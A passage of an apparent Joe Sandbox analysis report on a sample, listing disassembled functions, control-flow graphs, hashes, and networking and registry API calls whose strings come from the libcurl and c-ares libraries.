                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: fb25663f68c727def78012b4b4f1668e4c05e30a195c5b00dad9631d43e92fca
                                                              • Instruction ID: 86c852be6e2b70ba68e64a481eeb2064bf5bfe76b17ff85964b685c4197906a5
                                                              • Opcode Fuzzy Hash: fb25663f68c727def78012b4b4f1668e4c05e30a195c5b00dad9631d43e92fca
                                                              • Instruction Fuzzy Hash: 59E1F8B49047499FCB10EF69D98569EBBF4EF44304F10886AE888DB350E774DA88DF52
                                                              Function 009405B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1310 9405b0-9405b7 1311 9405bd-9405d4 1310->1311 1312 9407ee 1310->1312 1313 9407e7-9407ed 1311->1313 1314 9405da-9405e6 1311->1314 1313->1312 1314->1313 1315 9405ec-9405f0 1314->1315 1316 9405f6-940620 call 947350 call 9370b0 1315->1316 1317 9407c7-9407cc 1315->1317 1322 940622-940624 1316->1322 1323 94066a-94068c call 96dec0 1316->1323 1317->1313 1325 940630-940655 call 9370d0 call 9403c0 call 947450 1322->1325 1329 9407d6-9407e3 call 947380 1323->1329 1330 940692-9406a0 1323->1330 1350 9407ce 1325->1350 1351 94065b-940668 call 9370e0 1325->1351 1329->1313 1333 9406f4-9406f6 1330->1333 1334 9406a2-9406a4 1330->1334 1336 9406fc-9406fe 1333->1336 1337 9407ef-94082b call 943000 1333->1337 1339 9406b0-9406e4 call 9473b0 1334->1339 1341 94072c-940754 1336->1341 1354 940831-940837 1337->1354 1355 940a2f-940a35 1337->1355 1339->1329 1349 9406ea-9406ee 1339->1349 1346 940756-94075b 1341->1346 1347 94075f-94078b 1341->1347 1352 940707-940719 WSAEventSelect 1346->1352 1353 94075d 1346->1353 1367 940700-940703 1347->1367 1368 940791-940796 1347->1368 1349->1339 1356 9406f0 1349->1356 1350->1329 1351->1323 1351->1325 1352->1329 1360 94071f 1352->1360 1361 940723-940726 1353->1361 1363 940861-94087e 1354->1363 1364 940839-94084c call 946fa0 1354->1364 1357 940a37-940a3a 1355->1357 1358 940a3c-940a52 1355->1358 1356->1333 1357->1358 1358->1329 1365 940a58-940a81 call 942f10 1358->1365 1360->1361 1361->1337 1361->1341 1377 940882-94088d 1363->1377 1375 940852 1364->1375 1376 940a9c-940aa4 1364->1376 1365->1329 1383 940a87-940a97 call 946df0 1365->1383 1367->1352 1368->1367 1370 94079c-9407c2 call 9376a0 1368->1370 1370->1367 1375->1363 1380 940854-94085f 1375->1380 1376->1329 1381 940970-940975 1377->1381 1382 940893-9408b1 1377->1382 1380->1377 1384 940a19-940a2c 1381->1384 1385 94097b-940989 call 9370b0 1381->1385 1386 9408c8-9408f7 1382->1386 1383->1329 1384->1355 1385->1384 1393 94098f-94099e 1385->1393 1394 9408fd-940925 1386->1394 1395 9408f9-9408fb 1386->1395 1396 9409b0-9409c1 call 9370d0 1393->1396 1397 940928-94093f 1394->1397 1395->1397 1403 9409a0-9409ae call 9370e0 1396->1403 1404 9409c3-9409c7 1396->1404 1401 940945-94096b 1397->1401 1402 9408b3-9408c2 1397->1402 1401->1402 1402->1381 1402->1386 1403->1384 1403->1396 1406 9409e8-940a03 WSAEnumNetworkEvents 1404->1406 1407 940a05-940a17 1406->1407 1408 9409d0-9409e6 WSAEventSelect 1406->1408 1407->1408 1408->1403 1408->1406
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00940712
                                                              • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 009409DC
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 009409FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: multi.c
                                                              • API String ID: 2170980988-214371023
                                                              • Opcode ID: 68a4caeaa6ad339fad0ac29024c043039de8c0643e9ed7e8d21f087b8af2df5e
                                                              • Instruction ID: 487e591e886c6bca9088abf6bf9b1547815fd8cc959efc53f371d91756144c40
                                                              • Opcode Fuzzy Hash: 68a4caeaa6ad339fad0ac29024c043039de8c0643e9ed7e8d21f087b8af2df5e
                                                              • Instruction Fuzzy Hash: 47D1AD756083059BEB10CF64C881B6BBBE9FFD4348F04482CFA8596242E775E958CB93
                                                              Function 00937770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1553 937770-93778e 1554 937790-937797 1553->1554 1555 9377b6-9377c2 recv 1553->1555 1554->1555 1556 937799-9377a1 1554->1556 1557 9377c4-9377d9 call 9372a0 1555->1557 1558 93782e-937832 1555->1558 1559 9377a3-9377b4 1556->1559 1560 9377db-937829 call 9372a0 call 93cb20 call cb8c50 1556->1560 1557->1558 1559->1557 1560->1558
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: ff2b8a617370c8bbd56d17a575537d7c197db58bff1ca1531ce719ec0ac77657
                                                              • Instruction ID: 433f82c3418ee04180ba26109b7a5d9ee70466df3e44ce143d4918e546f9248a
                                                              • Opcode Fuzzy Hash: ff2b8a617370c8bbd56d17a575537d7c197db58bff1ca1531ce719ec0ac77657
                                                              • Instruction Fuzzy Hash: D4110DF5A1C348BFE530A7599C4AE2BBB9CDFC5B68F441518F80863342D5659C04C9B2
                                                              Function 00946FA0 Relevance: 6.3, APIs: 4, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e03ddbdbc2bb70ea7a21e23a64836e01825c8f0fec823268674e2c38313f7bd
                                                              • Instruction ID: 25d01756dc777b1baef9eeaed6d749f7d67da3fc5eedf6b9314f3448d3735958
                                                              • Opcode Fuzzy Hash: 3e03ddbdbc2bb70ea7a21e23a64836e01825c8f0fec823268674e2c38313f7bd
                                                              • Instruction Fuzzy Hash: CB91CD3060D34E4BD7358EA88894BBBF2D9EBC4364F148B2CE8A9461D4EBB59D409691
                                                              Function 009FB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 009FB2B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: 01d018446367ddb3796a5d45afdc1a042045a9744b82bb5faf2990a7d74deecc
                                                              • Instruction ID: 5249827489a94acdcb004c67a745040dad3d325ea6e131988915a0380acb9f79
                                                              • Opcode Fuzzy Hash: 01d018446367ddb3796a5d45afdc1a042045a9744b82bb5faf2990a7d74deecc
                                                              • Instruction Fuzzy Hash: 91C18D316053099FD718DF24C890A7A77E5EF88354F14886CFA998B3A2DB74ED45CB81
                                                              Function 009331D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: fd2b7a65934e625d63acae62f6f817cd479113c0f63093481058d12dc4cd24b3
                                                              • Instruction ID: e6bbbc1348e68377d86f041b6fc07616fc8cc5b7fab047e990879ccc6c719d88
                                                              • Opcode Fuzzy Hash: fd2b7a65934e625d63acae62f6f817cd479113c0f63093481058d12dc4cd24b3
                                                              • Instruction Fuzzy Hash: AB31A0B49097089BCB00EFB8D58569EBBF4EF44300F00886AE898A7351E7749A44DF62
                                                              Function 009EA440 Relevance: 46.6, APIs: 17, Strings: 9, Instructions: 1066registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 009EAA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 009EAA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 009EAA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 009EAAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 009EAB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 009EAB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 009EAB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 009EAC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 009EAD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 009EAD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 009EADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 009EAE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 009EAE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 009EAE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 009EAF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 009EAFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 009EB072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: C;$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-2839143964
                                                              • Opcode ID: de959e430eb24dca6abc9f4829848f5bbf5010d0d07cf3637483d92daa60171a
                                                              • Instruction ID: 0e31c7b0c1864c757bb0be785841163027f3dc502a4bc35f4deaf34c6ca98345
                                                              • Opcode Fuzzy Hash: de959e430eb24dca6abc9f4829848f5bbf5010d0d07cf3637483d92daa60171a
                                                              • Instruction Fuzzy Hash: 5872AFB1609341AFE711DB25CC82F6BB7E8AF85700F144828F985972A1EB75ED44CB63
                                                              Function 0096A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0096A831
                                                              Strings
                                                              • Could not set TCP_NODELAY: %s, xrefs: 0096A871
                                                              • @, xrefs: 0096A8F4
                                                              • @, xrefs: 0096AC42
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0096A6CE
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 0096A796
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 0096AE60
                                                              • Trying %s:%d..., xrefs: 0096A7C2, 0096A7DE
                                                              • bind failed with errno %d: %s, xrefs: 0096B080
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 0096ADAC
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0096AD0A
                                                              • Local port: %hu, xrefs: 0096AF28
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 0096AE1F
                                                              • cf-socket.c, xrefs: 0096A5CD, 0096A735
                                                              • Trying [%s]:%d..., xrefs: 0096A689
                                                              • Bind to local port %d failed, trying next, xrefs: 0096AFE5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: 328eac4eddfbbf73525b1f8d8eda5c2600f5123354597eb18bb73e6902ec6432
                                                              • Instruction ID: 21921d26cebe6afb76c7ff84e6dad1d1db2f93d8f5453ed3b46e0c062edf5d6d
                                                              • Opcode Fuzzy Hash: 328eac4eddfbbf73525b1f8d8eda5c2600f5123354597eb18bb73e6902ec6432
                                                              • Instruction Fuzzy Hash: BC62F371508341ABE721CF24C846BABB7E9BFD1314F044929F989A7292E771E944CF93
                                                              Function 009F9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 509 9f9740-9f975b 510 9f975d-9f9768 call 9f78a0 509->510 511 9f9780-9f9782 509->511 520 9f976e-9f9770 510->520 521 9f99bb-9f99c0 510->521 513 9f9788-9f97a0 call cb8e00 call 9f78a0 511->513 514 9f9914-9f994e call cb8b70 RegOpenKeyExA 511->514 513->521 525 9f97a6-9f97c5 513->525 523 9f995a-9f9992 RegQueryValueExA RegCloseKey call cb8b98 514->523 524 9f9950-9f9955 514->524 520->525 526 9f9772-9f977e 520->526 527 9f9a0c-9f9a15 521->527 539 9f9997-9f99b5 call 9f78a0 523->539 524->527 532 9f9827-9f9833 525->532 533 9f97c7-9f97e0 525->533 526->513 535 9f985f-9f9872 call 9f5ca0 532->535 536 9f9835-9f985c call 9ee2b0 * 2 532->536 537 9f97f6-9f9809 533->537 538 9f97e2-9f97f3 call cb8b50 533->538 550 9f9878-9f987d call 9f77b0 535->550 551 9f99f0 535->551 536->535 537->532 549 9f980b-9f9810 537->549 538->537 539->521 539->525 549->532 554 9f9812-9f9822 549->554 556 9f9882-9f9889 550->556 553 9f99f5-9f99fb call 9f5d00 551->553 564 9f99fe-9f9a09 553->564 554->527 556->553 560 9f988f-9f989b call 9e4fe0 556->560 560->551 567 9f98a1-9f98c3 call cb8b50 call 9f78a0 560->567 564->527 573 9f98c9-9f98db call 9ee2d0 567->573 574 9f99c2-9f99ed call 9ee2b0 * 2 567->574 573->574 579 9f98e1-9f98f0 call 9ee2d0 573->579 574->551 579->574 585 9f98f6-9f9905 call 9f63f0 579->585 589 9f990b-9f990f 585->589 590 9f9f66-9f9f7f call 9f5d00 585->590 591 9f9a3f-9f9a5a call 9f6740 call 9f63f0 589->591 590->564 591->590 